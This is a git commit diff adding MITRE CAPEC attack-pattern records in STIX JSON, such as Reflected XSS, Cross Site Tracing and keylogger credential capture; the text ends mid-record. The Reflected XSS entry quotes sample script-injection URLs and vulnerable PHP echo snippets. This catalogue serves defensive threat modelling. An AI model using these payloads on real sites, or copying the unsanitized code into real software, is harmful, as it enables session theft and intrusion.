adam/cti
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

version 3.2

Browse Source
This commit is contained in:
Rich Piazza
2019-10-10 14:34:30 -04:00
parent 9db16616bb
commit 8fce35d677
2044 changed files with 70319 additions and 8202 deletions
Download Patch File Download Diff File Expand all files Collapse all files
.gitignore
+1
View File
@@ -1,2 +1,3 @@
hashes.json
*.pyc
.DS_Store
capec/attack-pattern/attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15.json
+46
View File
@@ -0,0 +1,46 @@
{
"type": "bundle",
"id": "bundle--db1938e8-6414-4189-a402-067ef5c5c6d0",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0278e44f-8fb4-4c02-bde1-0ccbe12a1b15",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "Action Spoofing",
"description": "An adversary is able to disguise one action for another and therefore trick a user into initiating one type of action when they intend to initiate a different action. For example, a user might be led to believe that clicking a button will submit a query, but in fact it downloads software. Adversaries may perform this attack through social means, such as by simply convincing a victim to perform the action or relying on a user's natural inclination to do so, or through technical means, such as a clickjacking attack where a user sees one interface but is actually interacting with a second, invisible, interface.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/173.html",
"external_id": "CAPEC-173"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Availability": [
"Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)"
],
"Confidentiality": [
"Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)"
],
"Integrity": [
"Other (Action spoofing can result in a wide variety of consequences and negatively affect all three elements of the security triad.)"
]
},
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The adversary must convince the victim into performing the decoy action.",
"The adversary must have the means to control a user's interface to present them with a decoy action as well as the actual malicious action. Simple versions of this attack can be performed using web pages requiring only that the adversary be able to host (or control) content that the user visits."
],
"x_capec_status": "Stable",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a.json
+76
View File
@@ -0,0 +1,76 @@
{
"type": "bundle",
"id": "bundle--736e1ec5-6a32-4902-922d-361941249d6b",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0296edfb-74a9-4c12-876a-a7371b585f4a",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2017-04-15T00:00:00.000Z",
"modified": "2019-09-30T00:00:00.000Z",
"name": "Reflected XSS",
"description": "This type of attack is a form of Cross-Site Scripting (XSS) where a malicious script is \"reflected\" off a vulnerable web application and then executed by a victim's browser. The process starts with an adversary delivering a malicious script to a victim and convincing the victim to send the script to the vulnerable web application. The most common method of this is through a phishing email where the adversary embeds the malicious script with a URL that the victim then clicks on. In processing the subsequent request, the vulnerable web application incorrectly considers the malicious script as valid input and uses it to creates a reposnse that is then sent back to the victim. To launch a successful Reflected XSS attack, an adversary looks for places where user-input is used directly in the generation of a response. This often involves elements that are not expected to host scripts such as image tags (<img>), or the addition of event attibutes such as onload and onmouseover. These elements are often not subject to the same input validation, output encoding, and other content filtering and checking routines.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/591.html",
"external_id": "CAPEC-591"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/79.html",
"external_id": "CWE-79"
},
{
"source_name": "reference_from_CAPEC",
"description": "Watchfire Research, XSS vulnerabilities in Google.com, Full Disclosure mailing list archives",
"url": "http://seclists.org/fulldisclosure/2005/Dec/1107",
"external_id": "REF-476"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)"
],
"Authorization": [
"Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)"
],
"Availability": [
"Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)"
],
"Confidentiality": [
"Read Data (A successful Reflected XSS attack can enable an adversary to exfiltrate sensitive information from the application.)",
"Gain Privileges (A successful Reflected XSS attack can enable an adversary to elevate their privilege level and access functionality they should not otherwise be allowed to access.)",
"Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)"
],
"Integrity": [
"Execute Unauthorized Commands (A successful Reflected attack can enable an adversary run arbitrary code of their choosing, thus enabling a complete compromise of the application.)",
"Modify Data (A successful Reflected attack can allow an adversary to tamper with application data.)"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>Consider a web application that enables or disables some of the fields of a form on the page via the use of a mode parameter provided on the query string.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\">http://my.site.com/aform.html?mode=full</xhtml:div>\n <xhtml:p>The application\u2019s server-side code may want to display this mode value in the HTML page being created to give the users an understanding of what mode they are in. In this example, PHP is used to pull the value from the URL and generate the desired HTML.</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\"><?phpecho 'Mode is: ' . $_GET[\"mode\"];?></xhtml:div>\n <xhtml:p>Notice how the value provided on the URL is used directly with no input validation performed and no output encoding in place. A maliciously crafted URL can thus be formed such that if a victim clicked on the URL, a malicious script would then be executed by the victim\u2019s browser:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">http://my.site.com/aform.html?mode=<script>alert('hi');</script></xhtml:div>\n ",
"\n <xhtml:p>Reflected XSS attacks can take advantage of HTTP headers to compromise a victim. For example, assume a vulnerable web application called \u2018mysite\u2019 dynamically generates a link using an HTTP header such as HTTP_REFERER. Code somewhere in the application could look like:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"informative\"><?phpecho \"<a href=\"$_SERVER['HTTP_REFERER']\">Test URL</a>\"?></xhtml:div>\n <xhtml:p>The HTTP_REFERER header is populated with the URI that linked to the currently executing page. A web site can be created and hosted by an adversary that takes advantage of this by adding a reference to the vulnerable web application. By tricking a victim into clicking a link that executes the attacker\u2019s web page, such as:</xhtml:p>\n <xhtml:div style=\"margin-left:10px;\" class=\"attack\">\"http://attackerswebsite.com?<script>malicious content</script>\"</xhtml:div>\n <xhtml:p>The vulnerable web application ('mysite') is now called via the attacker's web site, initiated by the victim's web browser. The HTTP_REFERER header will contain a malicious script, which is embedded into the page by the vulnerable application and served to the victim. The victim\u2019s web browser then executes the injected script, thus compromising the victim\u2019s machine.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"An application that leverages a client-side web browser with scripting enabled.",
"An application that fail to adequately sanitize or encode untrusted input."
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"Medium": "Requires the ability to write malicious scripts and embed them into HTTP requests."
},
"x_capec_status": "Stable",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc.json
+48
View File
@@ -0,0 +1,48 @@
{
"type": "bundle",
"id": "bundle--eb3d2a8a-9fae-44d1-b3d9-6179fd0ee633",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--02ea234a-137e-4e2c-b0d6-9eaba93746fc",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2014-06-23T00:00:00.000Z",
"name": "SaaS User Request Forgery",
"description": "An adversary, through a previously installed malicious application, performs malicious actions against a third-party Software as a Service (SaaS) application (also known as a cloud based application) by leveraging the persistent and implicit trust placed on a trusted user's session. This attack is executed after a trusted user is authenticated into a cloud service, \"piggy-backing\" on the authenticated session, and exploiting the fact that the cloud service believes it is only interacting with the trusted user. If successful, the actions embedded in the malicious application will be processed and accepted by the targeted SaaS application and executed at the trusted user's privilege level.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/510.html",
"external_id": "CAPEC-510"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/346.html",
"external_id": "CWE-346"
},
{
"source_name": "reference_from_CAPEC",
"description": "Ami Luttwak, A new Zeus variant targeting Salesforce.com \u2013 Research and Analysis, Adallom, Inc.",
"url": "http://www.adallom.com/blog/a-new-zeus-variant-targeting-salesforce-com-accounts-research-and-analysis/",
"external_id": "REF-438"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Standard",
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"An adversary must be able install a purpose built malicious application onto the trusted user's system and convince the user to execute it while authenticated to the SaaS application."
],
"x_capec_skills_required": {
"Medium": "This attack pattern often requires the technical ability to modify a malicious software package (e.g. Zeus) to spider a targeted site and a way to trick a user into a malicious software download."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Medium",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--02f28ad7-180e-4f98-9716-1ae8851748da.json
+59
View File
@@ -0,0 +1,59 @@
{
"type": "bundle",
"id": "bundle--006f9c2b-8dba-44a2-82e6-7eb976be82fe",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--02f28ad7-180e-4f98-9716-1ae8851748da",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2019-04-04T00:00:00.000Z",
"name": "Read Sensitive Strings Within an Executable",
"description": "An adversary engages in activities to discover any sensitive strings are present within the compiled code of an executable, such as literal ASCII strings within the file itself, or possibly strings hard-coded into particular routines that can be revealed by code refactoring methods including static and dynamic analysis. One specific example of a sensitive string is a hard-coded password. Typical examples of software with hard-coded passwords include server-side executables which may check for a hard-coded password or key during a user's authentication with the server. Hard-coded passwords can also be present in client-side executables which utilize the password or key when connecting to either a remote component, such as a database server, licensing server, or otherwise, or a processes on the same host that expects a key or password. When analyzing an executable the adversary may search for the presence of such strings by analyzing the byte-code of the file itself. Example utilities for revealing strings within a file include 'strings,' 'grep,' or other variants of these programs depending upon the type of operating system used. These programs can be used to dump any ASCII or UNICODE strings contained within a program. Strings can also be searched for using a hex editors by loading the binary or object code file and utilizing native search functions such as regular expressions.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/191.html",
"external_id": "CAPEC-191"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/798.html",
"external_id": "CWE-798"
},
{
"source_name": "reference_from_CAPEC",
"description": "Wikipedia, The Wikimedia Foundation, Inc",
"url": "http://en.wikipedia.org/wiki/Decompiler",
"external_id": "REF-51"
},
{
"source_name": "reference_from_CAPEC",
"description": "Wikipedia, The Wikimedia Foundation, Inc",
"url": "http://en.wikipedia.org/wiki/Debugger",
"external_id": "REF-52"
},
{
"source_name": "reference_from_CAPEC",
"description": "Wikipedia, The Wikimedia Foundation, Inc",
"url": "http://en.wikipedia.org/wiki/Disassembler",
"external_id": "REF-53"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"Access to a binary or executable such that it can be analyzed by various utilities."
],
"x_capec_resources_required": [
"Binary analysis programs such as 'strings' or 'grep', or hex editors."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a.json
+106
View File
@@ -0,0 +1,106 @@
{
"type": "bundle",
"id": "bundle--2760435d-4de8-4727-9ea3-88d1221b774a",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--03947e14-b3b5-4838-823c-0af6f255c25a",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Buffer Overflow via Symbolic Links",
"description": "This type of attack leverages the use of symbolic links to cause buffer overflows. An attacker can try to create or manipulate a symbolic link file such that its contents result in out of bounds data. When the target software processes the symbolic link file, it could potentially overflow internal buffers with insufficient bounds checking.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/45.html",
"external_id": "CAPEC-45"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/120.html",
"external_id": "CWE-120"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/285.html",
"external_id": "CWE-285"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/302.html",
"external_id": "CWE-302"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/118.html",
"external_id": "CWE-118"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/119.html",
"external_id": "CWE-119"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/74.html",
"external_id": "CWE-74"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/20.html",
"external_id": "CWE-20"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/680.html",
"external_id": "CWE-680"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/697.html",
"external_id": "CWE-697"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Availability": [
"Unreliable Execution",
"Execute Unauthorized Commands (Run Arbitrary Code)"
],
"Confidentiality": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Read Data"
],
"Integrity": [
"Execute Unauthorized Commands (Run Arbitrary Code)",
"Modify Data"
]
},
"x_capec_example_instances": [
"\n <xhtml:div style=\"color:#32498D; font-weight:bold;\">Attack Example: Overflow with Symbolic Links in EFTP Server</xhtml:div>\n <xhtml:p>The EFTP server has a buffer overflow that can be exploited if an attacker uploads a .lnk (link) file that contains more than 1,744 bytes. This is a classic example of an indirect buffer overflow. First the attacker uploads some content (the link file) and then the attacker causes the client consuming the data to be exploited. In this example, the ls command is exploited to compromise the server software.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"The attacker can create symbolic link on the target host.",
"The target host does not perform correct boundary checking while consuming data from a resources."
],
"x_capec_skills_required": {
"High": "Exploiting a buffer overflow to inject malicious code into the stack of a software system or even the heap can require a higher skill level.",
"Low": "An attacker can simply overflow a buffer by inserting a long string into an attacker-modifiable injection vector. The result can be a DoS."
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70.json
+108
View File
@@ -0,0 +1,108 @@
{
"type": "bundle",
"id": "bundle--0bf27516-4e6a-490e-b131-730ff173670c",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--03e9118d-fe93-4778-a350-9d597441ed70",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2015-11-09T00:00:00.000Z",
"name": "Exploitation of Trusted Credentials",
"description": "Attacks on session IDs and resource IDs take advantage of the fact that some software accepts user input without verifying its authenticity. For example, a message queuing system that allows service requesters to post messages to its queue through an open channel (such as anonymous FTP), authorization is done through checking group or role membership contained in the posted message. However, there is no proof that the message itself, the information in the message (such group or role membership), or indeed the process that wrote the message to the queue are authentic and authorized to do so. Many server side processes are vulnerable to these attacks because the server to server communications have not been analyzed from a security perspective or the processes \"trust\" other systems because they are behind a firewall. In a similar way servers that use easy to guess or spoofable schemes for representing digital identity can also be vulnerable. Such systems frequently use schemes without cryptography and digital signatures (or with broken cryptography). Session IDs may be guessed due to insufficient randomness, poor protection (passed in the clear), lack of integrity (unsigned), or improperly correlation with access control policy enforcement points. Exposed configuration and properties files that contain system passwords, database connection strings, and such may also give an attacker an edge to identify these identifiers. The net result is that spoofing and impersonation is possible leading to an attacker's ability to break authentication, authorization, and audit controls on the system.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/21.html",
"external_id": "CAPEC-21"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/290.html",
"external_id": "CWE-290"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/302.html",
"external_id": "CWE-302"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/346.html",
"external_id": "CWE-346"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/539.html",
"external_id": "CWE-539"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/6.html",
"external_id": "CWE-6"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/384.html",
"external_id": "CWE-384"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/664.html",
"external_id": "CWE-664"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/602.html",
"external_id": "CWE-602"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/642.html",
"external_id": "CWE-642"
},
{
"source_name": "reference_from_CAPEC",
"description": "G. Hoglund, G. McGraw, Exploiting Software: How to Break Code, 2004--02, Addison-Wesley",
"external_id": "REF-1"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Meta",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Confidentiality": [
"Gain Privileges",
"Read Data"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_example_instances": [
"\n <xhtml:p>Thin client applications like web applications are particularly vulnerable to session ID attacks. Since the server has very little control over the client, but still must track sessions, data, and objects on the server side, cookies and other mechanisms have been used to pass the key to the session data between the client and server. When these session keys are compromised it is trivial for an attacker to impersonate a user's session in effect, have the same capabilities as the authorized user. There are two main ways for an attacker to exploit session IDs.</xhtml:p>\n <xhtml:p>A brute force attack involves an attacker repeatedly attempting to query the system with a spoofed session header in the HTTP request. A web server that uses a short session ID can be easily spoofed by trying many possible combinations so the parameters session-ID= 1234 has few possible combinations, and an attacker can retry several hundred or thousand request with little to no issue on their side.</xhtml:p>\n <xhtml:p>The second method is interception, where a tool such as wireshark is used to sniff the wire and pull off any unprotected session identifiers. The attacker can then use these variables and access the application.</xhtml:p>\n "
],
"x_capec_likelihood_of_attack": "High",
"x_capec_prerequisites": [
"Server software must rely on weak session IDs proof and/or verification schemes"
],
"x_capec_resources_required": [
"Ability to deploy software on network. Ability to communicate synchronously or asynchronously with server"
],
"x_capec_skills_required": {
"Low": "To achieve a direct connection with the weak or non-existent server session access control, and pose as an authorized user"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014.json
+33
View File
@@ -0,0 +1,33 @@
{
"type": "bundle",
"id": "bundle--9ffcd5b5-52bf-4ebf-919f-9f109b97c3d9",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--0500cb36-fc64-4b99-be3d-156b7867d014",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2015-11-09T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "Capture Credentials via Keylogger",
"description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/568.html",
"external_id": "CAPEC-568"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_prerequisites": [
"The ability to install the keylogger, either in person or remote."
],
"x_capec_status": "Draft",
"x_capec_typical_severity": "High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--058622b3-81cb-403b-9169-404832c7afaf.json
+77
View File
@@ -0,0 +1,77 @@
{
"type": "bundle",
"id": "bundle--80a5fb47-2aec-426e-937a-ec8245392c9e",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--058622b3-81cb-403b-9169-404832c7afaf",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-08-04T00:00:00.000Z",
"name": "Cross Site Tracing",
"description": "Cross Site Tracing (XST) enables an adversary to steal the victim's session cookie and possibly other authentication credentials transmitted in the header of the HTTP request when the victim's browser communicates to destination system's web server. The adversary first gets a malicious script to run in the victim's browser that induces the browser to initiate an HTTP TRACE request to the web server. If the destination web server allows HTTP TRACE requests, it will proceed to return a response to the victim's web browser that contains the original HTTP request in its body. The function of HTTP TRACE, as defined by the HTTP specification, is to echo the request that the web server receives from the client back to the client. Since the HTTP header of the original request had the victim's session cookie in it, that session cookie can now be picked off the HTTP TRACE response and sent to the adversary's malicious site. XST becomes relevant when direct access to the session cookie via the \"document.cookie\" object is disabled with the use of httpOnly attribute which ensures that the cookie can be transmitted in HTTP requests but cannot be accessed in other ways. Using SSL does not protect against XST. If the system with which the victim is interacting is susceptible to XSS, an adversary can exploit that weakness directly to get his or her malicious script to issue an HTTP TRACE request to the destination system's web server. In the absence of an XSS weakness on the site with which the victim is interacting, an adversary can get the script to come from the site that he controls and get it to execute in the victim's browser (if he can trick the victim's into visiting his malicious website or clicking on the link that he supplies). However, in that case, due to the same origin policy protection mechanism in the browser, the adversary's malicious script cannot directly issue an HTTP TRACE request to the destination system's web server because the malicious script did not originate at that domain. An adversary will then need to find a way to exploit another weakness that would enable him or her to get around the same origin policy protection.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/107.html",
"external_id": "CAPEC-107"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/693.html",
"external_id": "CWE-693"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/648.html",
"external_id": "CWE-648"
},
{
"source_name": "reference_from_CAPEC",
"description": "Jeremiah Grossman, Cross-Site Tracing (XST), 2003, WhiteHat Security",
"url": "http://www.cgisecurity.com/whitehat-mirror/WH-WhitePaper_XST_ebook.pdf",
"external_id": "REF-3"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Gain Privileges"
],
"Authorization": [
"Gain Privileges"
],
"Confidentiality": [
"Read Data",
"Gain Privileges"
],
"Integrity": [
"Modify Data"
]
},
"x_capec_example_instances": [
"An adversary determines that a particular system is vulnerable to reflected cross-site scripting (XSS) and endeavors to leverage this weakness to steal the victim's authentication cookie. An adversary realizes that since httpOnly attribute is set on the user's cookie, it is not possible to steal it directly with his malicious script. Instead, the adversary has their script use XMLHTTP ActiveX control in the victim's IE browser to issue an HTTP TRACE to the target system's server which has HTTP TRACE enabled. The original HTTP TRACE request contains the session cookie and so does the echoed response. The adversary picks the session cookie from the body of HTTP TRACE response and ships it to the adversary. The adversary then uses the newly acquired victim's session cookie to impersonate the victim in the target system."
],
"x_capec_likelihood_of_attack": "Medium",
"x_capec_prerequisites": [
"HTTP TRACE is enabled on the web server",
"The destination system is susceptible to XSS or an adversary can leverage some other weakness to bypass the same origin policy",
"Scripting is enabled in the client's browser",
"HTTP is used as the communication protocol between the server and the client"
],
"x_capec_resources_required": [
"None: No specialized resources are required to execute this type of attack."
],
"x_capec_skills_required": {
"Medium": "Understanding of the HTTP protocol and an ability to craft a malicious script"
},
"x_capec_status": "Draft",
"x_capec_typical_severity": "Very High",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--064c9dd0-8008-4ca9-bde6-63feef10d053.json
+29
View File
@@ -0,0 +1,29 @@
{
"type": "bundle",
"id": "bundle--7f3d4eff-2969-478d-a082-4646e0c38edf",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--064c9dd0-8008-4ca9-bde6-63feef10d053",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2017-05-01T00:00:00.000Z",
"name": "DEPRECATED: DTD Injection in a SOAP Message",
"description": "This pattern has been deprecated as it was determined to be an unnecessary layer of abstraction. Please refer to the pattern CAPEC-228 : DTD Injection going forward.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/254.html",
"external_id": "CAPEC-254"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_status": "Deprecated",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--06e600b5-fc35-41e3-8f11-cfe801d0e623.json
+73
View File
@@ -0,0 +1,73 @@
{
"type": "bundle",
"id": "bundle--fa9b3edd-8f2d-48f1-ac6c-27a9fff524fc",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--06e600b5-fc35-41e3-8f11-cfe801d0e623",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "IP 'ID' Echoed Byte-Order Probe",
"description": "This OS fingerprinting probe tests to determine if the remote host echoes back the IP 'ID' value from the probe packet. An attacker sends a UDP datagram with an arbitrary IP 'ID' value to a closed port on the remote host to observe the manner in which this bit is echoed back in the ICMP error message. The identification field (ID) is typically utilized for reassembling a fragmented packet. Some operating systems or router firmware reverse the bit order of the ID field when echoing the IP Header portion of the original datagram within an ICMP error message.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/318.html",
"external_id": "CAPEC-318"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/200.html",
"external_id": "CWE-200"
},
{
"source_name": "reference_from_CAPEC",
"description": "Stuart McClure, Joel Scambray, George Kurtz, Hacking Exposed: Network Security Secrets & Solutions (6th Edition), 2009, McGraw Hill",
"external_id": "REF-33"
},
{
"source_name": "reference_from_CAPEC",
"description": "Defense Advanced Research Projects Agency Information Processing Techniques Office, Information Sciences Institute University of Southern California, RFC793 - Transmission Control Protocol, 1981--09, Defense Advanced Research Projects Agency (DARPA)",
"url": "http://www.faqs.org/rfcs/rfc793.html",
"external_id": "REF-128"
},
{
"source_name": "reference_from_CAPEC",
"description": "Gordon \"Fyodor\" Lyon, Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning (3rd \"Zero Day\" Edition,), 2008, Insecure.com LLC",
"external_id": "REF-212"
},
{
"source_name": "reference_from_CAPEC",
"description": "Gordon \"Fyodor\" Lyon, The Art of Port Scanning (Volume: 7, Issue. 51), Phrack Magazine, 1997",
"url": "http://phrack.org/issues/51/11.html",
"external_id": "REF-130"
}
],
"object_marking_refs": [
"marking-definition--7af89974-8179-4268-a77a-47d3f7bc1c89"
],
"x_capec_abstraction": "Detailed",
"x_capec_consequences": {
"Access_Control": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Authorization": [
"Bypass Protection Mechanism",
"Hide Activities"
],
"Confidentiality": [
"Read Data",
"Bypass Protection Mechanism",
"Hide Activities"
]
},
"x_capec_likelihood_of_attack": "Medium",
"x_capec_status": "Stable",
"x_capec_typical_severity": "Low",
"x_capec_version": "3.2"
}
]
}
capec/attack-pattern/attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71.json
+65
View File
@@ -0,0 +1,65 @@
{
"type": "bundle",
"id": "bundle--1274a858-2dc3-47e4-a68a-2c8862adfab3",
"spec_version": "2.0",
"objects": [
{
"type": "attack-pattern",
"id": "attack-pattern--072159ee-a734-4aec-8162-f36adbfb2f71",
"created_by_ref": "identity--99e72de9-cd42-43b1-906d-c4f855fd3322",
"created": "2014-06-23T00:00:00.000Z",
"modified": "2018-07-31T00:00:00.000Z",
"name": "WSDL Scanning",
"description": "This attack targets the WSDL interface made available by a web service. The attacker may scan the WSDL interface to reveal sensitive information about invocation patterns, underlying technology implementations and associated vulnerabilities. This type of probing is carried out to perform more serious attacks (e.g. parameter tampering, malicious content injection, command injection, etc.). WSDL files provide detailed information about the services ports and bindings available to consumers. For instance, the attacker can submit special characters or malicious content to the Web service and can cause a denial of service condition or illegal access to database records. In addition, the attacker may try to guess other private methods by using the information provided in the WSDL files.",
"external_references": [
{
"source_name": "capec",
"url": "https://capec.mitre.org/data/definitions/95.html",
"external_id": "CAPEC-95"
},
{
"source_name": "cwe",
"url": "http://cwe.mitre.org/data/definitions/538.html",
"external_id": "CWE-538"
},
{
"source_name": "reference_from_CAPEC",
